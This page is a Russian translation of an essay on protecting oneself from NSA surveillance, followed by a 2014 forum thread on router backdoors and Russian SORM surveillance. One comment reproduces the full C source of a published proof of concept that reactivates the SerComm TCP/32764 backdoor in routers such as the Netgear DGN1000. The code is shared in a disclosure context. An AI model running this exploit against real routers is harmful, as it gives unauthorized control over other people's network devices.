Как сохранить безопасность против слежки АНБ

Теперь, когда у нас достаточно подробностей о том, как АНБ шпионит за интернетом, включая сегодняшнюю публикацию о целенаправленных действиях АНБ по ослаблению криптосистем, мы наконец можем подумать, как обезопасить себя.

Последние две недели я вместе с Guardian работал над историей вокруг АНБ и прочитал сотни сверхсекретных документов АНБ, предоставленных информатором Эдвардом Сноуденом. Я не принимал участие в сегодняшней публикации — она готовилась задолго до моего появления, — но всё прочитанное мной подтверждает сообщения Guardian.

Теперь же, как мне кажется, я готов дать ряд советов, как оградить себя от подобного противника.

Основной способ слежки АНБ за интернет-коммуникациями — это каналы связи, именно там наилучшим образом масштабируются его технические возможности. Агентство реализовало гигантские программы по автоматическому сбору и анализу сетевого трафика. Но всё, что требует от него взлома конкретных компьютеров, является значительно более рискованным и затратным, и оно идёт на подобные действия гораздо реже.

АНБ имеет доступ к магистральным каналам интернета за счёт своих тайных соглашений с телекоммуникационными компаниями — всеми компаниями из США и Великобритании, а также ряда прочих своих «партнёров» по всему миру. В случаях, когда оно не может положиться на такой «дружественный» доступ, оно идёт на всё, чтобы обеспечить скрытое прослушивание коммуникаций: подключается к подводным кабелям, перехватывает спутниковую связь и т.д.

Объёмы получаемых данных огромны, но АНБ располагает в равной мере огромными возможностями, чтобы быстро просеивать их в поисках интересующего трафика. «Интересующими» могут быть множество характеристик: источник, адресат, содержание, участники коммуникации и прочее. Все эти сведения направляются в гигантскую систему АНБ для последующего анализа.

В ещё больших объёмах АНБ собирает метаданные трафика: кто и с кем связывается, когда, как долго, каким способом. Метаданные, по сравнению с содержанием, гораздо проще хранить и анализировать, они могут иметь чрезвычайно личный характер для человека и они невероятно ценны для разведки.

Возглавляет направление по сбору данных Управление системной разведки, и объёмы ресурсов, которые оно выделяет на эти цели, просто поражает. Я читаю отчёт за отчётом, рассматривающие возможности этих программ, их функциональные детали, планы модернизации и т.д. На каждую конкретную проблему — извлечение электронных сигналов из оптических кабелей, поддержание скорости перехвата терабайтных потоков данных, отфильтровывание интересующих вещей — есть своя отдельная группа, занятая поисками решений. Охват тем глобален.

АНБ также атакует и сами сетевые устройства: маршрутизаторы, свитчи, брандмауэры. Большинство этих устройств имеют встроенные функции для прослушки; хитрость заключается в том, чтобы незаметно активировать их. Это крайне плодотворное направление взлома: маршрутизаторы реже обновляют, на них реже установлены программные средства безопасности и они, как правило, не рассматриваются в качестве уязвимого компонента.

Кроме того, АНБ направляет значительные ресурсы на взлом оконечных компьютеров. Этим делом у них занимается группа TAO — Отделение адаптированного доступа. У TAO есть меню эксплоитов, которыми оно может «обслужить» ваш компьютер (будь он под управлением Windows, Mac OS, Linux, iOS или чего-то ещё), и ряд приёмов, чтобы доставить их на ваш компьютер. Их не обнаружит ни ваш антивирус, ни, скорее всего, вы сами, даже если будете знать, что искать. По сути, это хакерские инструменты, разработанные хакерами с практически безграничным бюджетом. Что я вынес из документов Сноудена — это тот факт, что если АНБ захочет влезть в ваш компьютер, оно влезет. Точка.

АНБ решает проблему зашифрованных данных, с которыми ему приходится сталкиваться, в основном обходя криптографию, нежели используя какие-то секретные математические открытия. Во-первых, в мире полно бестолковой криптографии. К примеру, если оно обнаруживает сетевое соединение, защищённое с помощью MS-CHAP, его легко взломать и восстановить ключ. Оно взламывает слабые пользовательские пароли, используя такие же словарные атаки, которыми пользуются гражданские хакеры.

Как мы сегодня узнали, АНБ также «взаимодействует» с разработчиками средств безопасности, чтобы их коммерческие средства шифрования были уязвимы в таких местах, о которых известно только Агентству. Мы помним, что такое уже было в истории: CryptoAG и Lotus Notes — два самых ярких примера, и есть свидетельства в пользу бэкдора в Windows. Несколько человек сообщили мне ряд более свежих историй из своего недавнего опыта, и вскоре я собираюсь об этом написать. В сущности, АНБ предлагает компаниям вносить небольшие незаметные изменения в их продукты: сделать генератор случайных чисел менее случайным, каким-либо образом производить утечку ключа, добавить общую экспоненту в протокол согласования ключей и т.п. Если кто-либо обнаруживает бэкдор, он объясняется как обычная программная ошибка. И, как нам теперь известно, АНБ добилось невероятных успехов с этой инициативой.

TAO также взламывает компьютеры для извлечения долгосрочных ключей. Таким образом, если вы поддерживаете VPN со сложным общим секретом для защиты данных, и АНБ посчитает их заслуживающими внимания, оно может попытаться выкрасть этот секрет. Такие операции предпринимаются только в отношении особо важных целей.

Итак, как же вам организовать безопасную связь при наличии такого противника? Сноуден дал ответ в своём интервью вскоре после обнародования своих первых документов: «Шифрование работает. Должным образом реализованные стойкие криптосистемы — одна из немногих вещей, на которую вы можете положиться».

Думаю, это правда, даже несмотря на сегодняшние откровения и провокационные намёки Джеймса Клэппера, директора национальной разведки, на «прорывные возможности криптоанализа», сделанные им в другом сверхсекретном документе. Все эти возможности заключаются в намеренном ослаблении криптографии.

Но последующая фраза Сноудена имеет не меньшую значимость: «К несчастью, оконечная безопасность столь ужасающе низка, что АНБ зачастую способно её обойти».

«Оконечная» — это программы, которые вы используете, компьютер, на котором вы их используете, и локальная сеть, в которой вы их используете. Если АНБ удастся модифицировать алгоритм шифрования или закинуть на ваш компьютер троян, никакая криптография на свете вам уже не поможет. Если вы хотите сохранить безопасность против АНБ, вам придётся пойти на всё, чтобы работе шифрования ничто не могло помешать.

Исходя из всего сказанного, у меня есть пять советов:

Спрячьтесь в сети. Используйте скрытые сервисы. Используйте Tor, чтобы самому оставаться анонимным. Да, АНБ интересуют пользователи Tor, но это всё равно препятствие для его работы. Чем менее вы заметны, в тем большей вы безопасности.
Шифруйте связь. Используйте TLS, используйте IPSec. Опять же, хотя АНБ целенаправленно перехватывает зашифрованные коммуникации (и, возможно, располагает специальными эксплойтами против названных протоколов), вы будете гораздо лучше защищены, чем при передаче данных открытым текстом.
Исходите из того, что хотя ваш компьютер могут взломать, для АНБ это будет дополнительной работой и риском, так что, вероятно, он не взломан. Если имеете дело с чем-то действительно важным, используйте автономные не подключенные к сети системы. С тех пор, как я начал работать с документами Сноудена, я купил новый компьютер, который никогда не подключал к интернету. Когда мне нужно передать файл, я зашифровываю его на безопасном компьютере и отношу к своему сетевому компьютеру на флэшке. Чтобы расшифровать что-то, я действую в обратном порядке. Этот метод не безупречен, но достаточно хорош.
Относитесь с подозрением к шифровальному ПО, особенно от крупных разработчиков. Полагаю, что большинство криптографических продуктов от больших американских компаний имеют бэкдоры для АНБ и, скорее всего, множество зарубежных тоже. Будет разумным допустить, что иностранные продукты идут в комплекте с собственными иностранными бэкдорами. АНБ проще встроить закладки в закрытое ПО, нежели в ПО с открытым исходным кодом. Системы с общими секретами более уязвимы для АНБ, за счёт как законных, так и нелегальных методов.
Старайтесь использовать стандартные методы шифрования, которые должны быть совместимы с другими реализациями. Например, АНБ труднее встроить бэкдор в TLS, нежели в BitLocker, поскольку реализация TLS у одного разработчика должна быть совместимой со всеми прочими реализациями TLS, тогда как BitLocker должен быть совместим лишь самим собой, что развязывает АНБ руки при внесении изменений. И поскольку BitLocker проприетарен, вероятность обнаружения в нём этих модификаций значительно ниже. Отдавайте предпочтение симметричному шифрованию над шифрованием с открытым ключом. Предпочитайте общепринятые системы на дискретных логарифмах перед системами на эллиптических кривых; последние содержат константы, проталкиваемые АНБ при малейшей возможности.

То время, что я работаю над документами Сноудена, я использую GPG, Silent Circle, Tails, OTR, TrueCrypt, BleachBit и ещё несколько вещей, о которых мне бы не хотелось распространяться. В моей программе Password Safe есть недокументированная шифровальная функция, доступная из командной строки; её я тоже использую.

Я сознаю, что большинство перечисленного невозможно для простого интернет-пользователя. Даже я сам не использую все эти инструменты для всего, над чем я работаю. И я по-прежнему, к сожалению, использую в основном Windows. С Linux было бы безопасней.

АНБ превратило саму ткань интернета с гигантскую платформу для слежки, но всё же оно не владеет тайной магией. Оно ограничено рамками тех же экономических реалий, что и все мы, и наилучший для нас способ самозащиты — сделать слежку за нами настолько дорогой, насколько это возможно.

Доверяйте математике. Шифрование — ваш друг. Хорошо обращайтесь с ними и сделайте всё от вас зависящее, чтобы они не были скомпрометированы. Это поможет вам оставаться в безопасности даже перед лицом АНБ.

На страницу: 1, 2, 3, 4, 5, ... , 14, 15, 16, 17, 18 След.

Комментарии [скрыть комментарии/форму]

—	*Гость* (19/04/2014 21:00) <#>

> Когда говорит чекист это означает всегда. Намёка путина открытым текстом для совсем глупых.

машинный перевод? я воопче ничего не понял)

—	*Гость* (19/04/2014 21:03) <#>

> их можно только выключить.

скорее всего кнопку замучаетесь искать. центральный рубильник далеко спрятан от обывателя.

—	SATtva (21/04/2014 11:40) профиль/связь <#> комментариев: 11558 документов: 1036 редакций: 4118

Использование роутеров небезопасно для вашего здоровья:

Производители маршрутизаторов вновь скрытно добавили бэкдор в свои устройства
<...>
Сейчас же исследователь сообщает, что несмотря на то, что в последней версии прошивки уязвимость была устранена, разработчики SerComm вернули ее обратно, несколько видоизменив. Для проверки выпущенного обновления эксперт проанализировал версию 1.1.0.55 для маршрутизатора модели Netgear DGN1000.

—	ressa (21/04/2014 13:19) профиль/связь <#> комментариев: 1079 документов: 58 редакций: 59

Да, я тоже сегодня эксплоит видел на эту тему:

/***************************************
* PoC to reactivate Sercomm TCP/32674 backdoor
* See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf
* Eloi Vanderbeken - Synacktiv
* 
* THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
* 
* PoC based on Wilmer van der Gaast's code 
* http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c
***************************************/
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>
 
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
 
#define ETH_P_NFTP      0x8888
 
enum backdoor_command {
    PING_BACKDOOR = 0x200,
    SCFGMGR_LAUNCH,
    SET_IP
};
 
struct ether_header
{
    unsigned char ether_dhost[ETH_ALEN];
    unsigned char ether_shost[ETH_ALEN];
    unsigned short ether_type;
} eth;
 
struct raw_packet {
    struct ether_header header;
    uint16_t            type;
    uint16_t            sequence;
    uint16_t            offset;
    uint16_t            chunk;
    uint16_t            payload_len;
    uint8_t             payload[528];
};
 
int main(int argc, char *argv[])
{
    int sockfd, res, i, len;
    char src_mac[ETH_ALEN];
    struct ifreq iface;
    struct sockaddr_ll socket_address;
    struct raw_packet packet;
 
    memset(&packet, 0, sizeof(packet));
 
    if (argc < 2)
    {
        fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]);
        exit(1);
    }
 
    sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd == -1) 
    {
        if(geteuid() != 0) 
        {
            fprintf(stderr, "You should probably run this program as root.\n");
        }
        perror("socket");
        exit(1);
    }
    seteuid(getuid());
 
    strncpy(iface.ifr_name, argv[1], IFNAMSIZ);
    res = ioctl(sockfd, SIOCGIFHWADDR, &iface);
    if(res < 0)
    {
        perror("ioctl");
        exit(1);
    }
    memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN);
 
 
    res = ioctl(sockfd, SIOCGIFINDEX, &iface);
    if(res < 0)
    {
        perror("ioctl");
        exit(1);
    }
 
    // set src mac
    memcpy(packet.header.ether_shost, src_mac, ETH_ALEN);
    // broadcast
    memset(packet.header.ether_dhost, 0xFF, ETH_ALEN);
    // MD5("DGN1000")
    memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10);
    packet.payload_len = htole16(0x10);
    // ethernet packet type = 0x8888
    packet.header.ether_type = htons(ETH_P_NFTP);
    // launch TCP/32764 backdoor
    packet.type = htole16(SCFGMGR_LAUNCH);
 
    socket_address.sll_family   = PF_PACKET;
    socket_address.sll_protocol = htons(ETH_P_NFTP);
    socket_address.sll_ifindex  = iface.ifr_ifindex;
    socket_address.sll_hatype   = ARPHRD_ETHER;
    socket_address.sll_pkttype  = PACKET_OTHERHOST;
    // broadcast
    socket_address.sll_halen = ETH_ALEN;
    memset(socket_address.sll_addr, 0xFF, ETH_ALEN);
 
    res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address));
    if (res == -1)
    {
        perror("sendto");
        exit(1);
    }
 
    do {
        memset(&packet, 0, sizeof(packet));
        res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL);
        if (res == -1) 
        {
            perror("recvfrom");
            exit(1);
        }
    } while (ntohs(packet.header.ether_type) != ETH_P_NFTP);
 
    if (res < sizeof(packet) - sizeof(packet.payload))
    {
        fprintf(stderr, "packet is too short: %d bytes\n", res);
        exit(1);
    }
 
    len = be16toh(packet.payload_len); // SerComm has a real problem with endianness
    printf("received packet: %d bytes (payload len = %d) from ", res, len);
    for (i = 0; i < ETH_ALEN; i++)
        printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':');
 
    for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++)
    {
        printf("%02X ", packet.payload[i]);
        if ((i+1) % 16 == 0)
            printf("\n");
    }
    printf("\n");
    return 0;
}

—	*Гость* (22/04/2014 05:47) <#>

Дальнейшие объяснения Сноудена про свой вопрос en,ru:

The leaker was aware that a frontal assault on the Russian leader likely wouldn’t make it past the Kremlin’s publicists. (“How do you succeed in lifting the taboo on state surveillance without being censored by state screeners?” Wizner asked.) So Snowden spent the first half of his pre-taped question talking about the ills of American surveillance.

"Разоблачитель знал, что лобовая атака против российского лидера, скорее всего, не будет пропущена кремлевскими пиарщиками. Так что Сноуден всю первую половину своего заранее записанного вопроса говорил о вреде американской слежки"

В общем, как выше мы и предполагали...

—	unknown (22/04/2014 11:07) профиль/связь <#> комментариев: 9796 документов: 488 редакций: 5664

Шнайер в своём блоге косвенно отреагировал, приведя некую ссылку.
Info on Russian Bulk Surveillance.

—	*Гость* (22/04/2014 12:18) <#>

> Info on Russian Bulk Surveillance.

SORM has been in use since 1990

По-моему, тут они перегнули палку. По-моему, первые подключения к Интернету в РФ — 95-ый год. Закон о СОРМе — 2003-ий. До 2003-его могли, конечно, полулегально слушать, но такого понятия, как СОРМ, как я понимаю, не существовало.

В комментах:

A humorous fact: The word 'sorm' in the Maltese language means 'ass' (as in bottom). An unfortunate choice of acronym.

Будем знать.

Там ещё много эйфории на тему того, что СОРМ не может вмешиваться в канал, он только пассивный снифер, поэтому дескать HTTPS — панацея. При этом не упоминаются случаи, когда переписка из фейсбука благополучно утекала органам без всяких ордеров.

—	unknown (24/04/2014 09:57, исправлен 24/04/2014 09:59) профиль/связь <#> комментариев: 9796 документов: 488 редакций: 5664

SATtva (21/04/2014 11:40:

Производители маршрутизаторов вновь скрытно добавили бэкдор в свои устройства

Чудесные file подробности с наглядными иллюстрациями. Вы всё ещё пользуетесь устройствами с закрытыми прошивками? Тогда мы идём к вам. С новым бэкдором.

—	*Гость* (24/04/2014 21:42) <#>

> Отбирают материал удобный для закладки идеологических штампов, разработанных программистами системы, под цели заказчика

А программистов кто программирует? И вообще, откуда ВЫ это знаете? ;)

—	*Гость* (25/04/2014 02:01) <#>

> Шнайер в своём блоге косвенно отреагировал, приведя некую ссылку

Они смутно представляют себе, что происходит на 1/6 части суши. Как пример, на cryptome Янг вываливал документы с украинской революции, title у всех был unknown.

> По-моему, тут они перегнули палку. По-моему, первые подключения к Интернету в РФ — 95-ый год. Закон о СОРМе — 2003-ий. До 2003-его могли, конечно, полулегально слушать, но такого понятия, как СОРМ, как я понимаю, не существовало.

Если помните, была такая штука FIDO. Да и вообще, СОРМ, в первоначальной своей реализации – это не только интернет сниффер, но и телефонный сниффер.

> SORM has been in use since 1990

И здесь, вероятно, погрешность в пол века, потому что корнями всё уходит в становление КГБ, годах в 1950 эта прослушка зародилась.

—	*Гость* (25/04/2014 10:53) <#>

> 1/6 части суши

Вам и здесь промыли мозги. 1/8-таки.

—	sentaus (25/04/2014 11:53, исправлен 25/04/2014 11:54) профиль/связь <#> комментариев: 1060 документов: 16 редакций: 32

СОРМ, в первоначальной своей реализации – это не только интернет сниффер, но и телефонный сниффер.

fixed: СОРМ в первоначальной своей реализации – это только телефонный сниффер.

—	*Гость* (25/04/2014 13:48) <#>

Нужно конкретизировать, везде говоря о СОРМ-2, а не о СОРМ. Из википедии:

Следует различать понятия «СОРМ-1» (систему прослушивания телефонных переговоров, организованную в 1996 году) и «СОРМ-2» (название предложено В. Ионовым — систему протоколирования обращений к сети Интернет), разработанную рабочей группой представителей Госкомсвязи России, ФСБ России, ЦНИИ Связи и Главсвязьнадзора под руководством Ю. В. Златкиса и организованную в 2000 году (ПТП, КТКС).

—	*Гость* (25/04/2014 13:54) <#>

[юмор]

> Из википедии

Последняя ссылка внизу вики-страницы о СОРМе — «сетевая анонимность» — ведёт... правильно, на /faq/anonimnostj.
[/юмор]

—	*Гость* (29/04/2014 14:01) <#>

Том Лейнстер (Tom Leinster), профессора Эдинбургского университета обращается в журнале New Scientist к математикам всего мира с призывом объявить бойкот Агентству национальной безопасности США и не работать ни над какими проектами по заказу этой организации.

> At a bare minimum, we mathematicians should talk about this. Maybe we should go further. Eminent mathematician Alexander Beilinson of the University of Chicago has proposed that the American Mathematical Society sever all ties with the NSA, and that working for it or its partners should become "socially unacceptable" in the same way that working for the KGB became unacceptable to many in the Soviet Union.

Maths spying: The quandary of working for the spooks

http://www.newscientist.com/ar.....pooks.html?full=true

На страницу: 1, 2, 3, 4, 5, ... , 14, 15, 16, 17, 18 След.

Ваша оценка документа [показать результаты]